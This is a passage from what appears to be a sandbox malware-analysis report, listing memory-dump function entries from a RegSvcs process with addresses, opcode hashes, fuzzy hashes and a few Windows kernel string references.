                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                              • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                                                                              • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                              • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                                                                              Function 0095FB50 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                              Function 0095FC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                              Function 0095FC30 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                              • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                                              • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                              • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                                              Function 0095FC48 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                              • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                                              • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                              • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                                              Function 0095FC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                              Function 00961D80 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                              • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                              • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                              • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                              Function 0095FD8C Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                              Function 0095FD5C Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                              • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                              • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                              • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                              Function 0095FEA0 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                              Function 0095FED0 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                              Function 0095FE24 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                              • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                              • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                              • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                              Function 0095FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                              Function 0095FFFC Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                              • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                              • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                              • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                              Function 0095FF34 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                              Function 00988788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 009887E6
                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 009889FC
                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 00988827
                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00988914
                                                                                                              • WindowsExcludedProcs, xrefs: 009887C1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcspbrk
                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                              • API String ID: 402402107-258546922
                                                                                                              • Opcode ID: 9f217b05b70302129a97081d888544c18a2ed745f21fcd77e2999140f987ac8b
                                                                                                              • Instruction ID: bc9d12bfbb7ca700d3230fea7171e35bb3fb31d81ad98c51c9950f98a210d80f
                                                                                                              • Opcode Fuzzy Hash: 9f217b05b70302129a97081d888544c18a2ed745f21fcd77e2999140f987ac8b
                                                                                                              • Instruction Fuzzy Hash: 65F1F7B6D00209EFCF11EFA5C981EEEB7B9FF48300F54446AE505A7211EB359A45DB60
                                                                                                              Function 009F822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
